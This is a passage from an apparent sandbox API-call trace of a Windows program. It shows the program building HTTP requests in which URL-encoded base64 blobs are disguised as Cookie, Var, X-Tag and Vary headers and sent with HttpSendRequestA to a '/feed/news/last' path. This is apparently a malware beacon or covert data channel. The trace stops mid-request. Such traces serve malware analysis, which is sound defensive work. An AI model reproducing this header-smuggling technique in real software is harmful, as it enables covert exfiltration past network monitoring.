%2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: ", lpString2="iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D" [0144.198] lstrcatA (in: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D", lpString2="\r\n" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n" [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caed20 | out: hHeap=0x440000) returned 1 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caf4f0 | out: hHeap=0x440000) returned 1 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabcb0 | out: hHeap=0x440000) returned 1 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabba0 | out: hHeap=0x440000) returned 1 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabde0 | out: hHeap=0x440000) returned 1 [0144.198] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0144.198] lstrlenA (lpString="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n") returned 1134 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2caee90, Size=0xa83) returned 0x2caee90 [0144.198] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0144.198] lstrcpyA (in: lpString1=0x2caf4a4, lpString2="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n" | out: lpString1="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n") returned="Var: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n" [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cae870 | out: hHeap=0x440000) returned 1 [0144.198] GetProcessHeap () returned 0x440000 [0144.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c962a0 | out: hHeap=0x440000) returned 1 [0144.199] lstrlenA (lpString="Date: Tuesday, 28 September 2021\r\nCookie: HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;\r\nVar: loY7P0M8SqcOPl%2BXVJh0gjNsyRAbgJGlHC%2FO9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec%2Bw9rhuMIxW%2FAn6LtjUwb04d8t4ElBGTnlNL4NwAv5%2FaMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS%2FwHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr%2F1MgxNlI3c3lteLbxbpwn7y4quiwiWD%2FuIF0loJNxXMqx%2FQZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw%3D%3D\r\nX-Tag: %2BRXdivW6tc1nF5bX2fkB3sAQAQhIie74226QvoLXFlHEAqoYfPHXaxF4ArvQLCXfq9PofpoF8OKd3vkblKGMH6zw7MtYu9yBgh%2BHXhZqeHJGnPGREOhAk9uNgnd5Owwk6IM5e1xLgr%2Bh2UPduNwit1GPyBD%2FJM8KKNySjjZdM6xDCGE7netphJKj5HlBjbuOpgHnBBFQKa0OoX%2FH22VU33w9o7BsjQ8WcUh9yWTGPA4sFSStXFnr9yN457C7UzAicu%2B1OFWoWumVNERz7WgJ6rOnuy7XpCl3AFFAAQooE4Mb%2FgtkZf9x42yo1jdInGBwYfj%2BVtHaMSFxhk0nTWooJA%3D%3D\r\nVary: iDcbusgPcI%2B9J48PSBM1LFqfLJw626%2BBtihZNtil17K%2BNQH%2BwXMUnsCqbgjyTzasu%2F6VmD2LqHEhexEHsbRHFFKDDZ7QYJev6XfTFJO5JJVs3Si%2BUUamI4Zv7E2oZK39azQJmDK8cWLRdF2qcNESTL5p4ombEvdZc4JieRFVvdbNauaOTPfPxAcU4cbo%2BSIVOEuD1w8F%2BkKDGshFgiK%2FVVneyInYSau5kCpChR5RdNZGIyCTtdsjad1yypUJ7YeF1ImgISsxQ%2FhRo7DOY7dp%2BmAd1h%2BQMXSURP5BDFPlX5W%2FSTQMi%2BPb7T2MDnK9Gf%2BK1a%2FukeydTpcJEYk1RGeJsw%3D%3D\r\n") returned 2690 [0144.200] GetProcAddress (hModule=0x7ffc51070000, lpProcName="HttpOpenRequestA") returned 0x7ffc511d20a0 [0144.200] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/feed/news/last", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x880000, dwContext=0x0) returned 0xcc000c [0144.201] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryOptionA") returned 0x7ffc510e1020 [0144.201] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x14f8e0, lpdwBufferLength=0x14f8e4 | out: lpBuffer=0x14f8e0, lpdwBufferLength=0x14f8e4) returned 1 [0144.201] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetSetOptionA") returned 0x7ffc510f3310 [0144.201] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x14f8e0, dwBufferLength=0x4) returned 1 [0144.201] GetProcAddress (hModule=0x7ffc51070000, lpProcName="HttpSendRequestA") returned 0x7ffc510a90c0 [0144.201] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Date: Tuesday, 28 September 2021\r\nCookie: 